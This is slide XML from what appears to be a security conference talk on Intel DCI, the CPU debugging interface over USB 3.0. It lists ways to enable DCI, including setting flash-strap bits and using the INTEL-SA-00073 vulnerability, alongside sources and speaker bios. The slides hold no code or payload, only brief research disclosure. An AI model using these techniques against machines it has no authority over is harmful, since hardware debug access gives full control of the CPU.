                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Could be supported:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>out-of-the-box (U-series CPUs only, very rare thing for desktop boards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>after p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>re-configur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> (setting the DCI enable bit in PCH straps of SPI flash memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>pre-configuration (repairing JTAG lines between CPU and PCH)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Connect through the USB 3.0 debug cable and debug the CPU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Some g</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>ood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>sources of information</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Intel DCI secrets (Maxim Goryachy, Mark Ermolov)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Tapping into the core (Maxim Goryachy, Mark Ermolov)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Intel DCI overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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422" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623879" y="1559880"/>
            <a:ext cx="2633127" cy="63828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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Just use the BIOS setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>actual for SoCs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 424"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Enabling Intel DCI. The simple way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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426" name="Shape 426"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573525" y="1628775"/>
            <a:ext cx="6904750" cy="3830250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="427" name="Shape 427"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="623875" y="2502950"/>
            <a:ext cx="2984250" cy="39988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277" name="Shape 277"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636480" y="3431177"/>
            <a:ext cx="11374920" cy="2264229"/>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77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Alexander Ermolov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>researcher, reverse engineer and information security expert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>a.ermolov@embedi.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>@flothrone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Ruslan Zakirov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>security researcher, prefers to believe nobody reads a bio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>r.zakirov@embedi.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2269287"/>
            <a:ext cx="1612080" cy="305204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="460440"/>
            <a:ext cx="8837640" cy="68544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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>About us</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Shape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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432" name="Shape 432"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Shape 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559875"/>
            <a:ext cx="5541900" cy="128040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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Or use the INTEL-SA-00073 vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>that some motherboards have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Requires setting HDCIEN bit in MMIO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
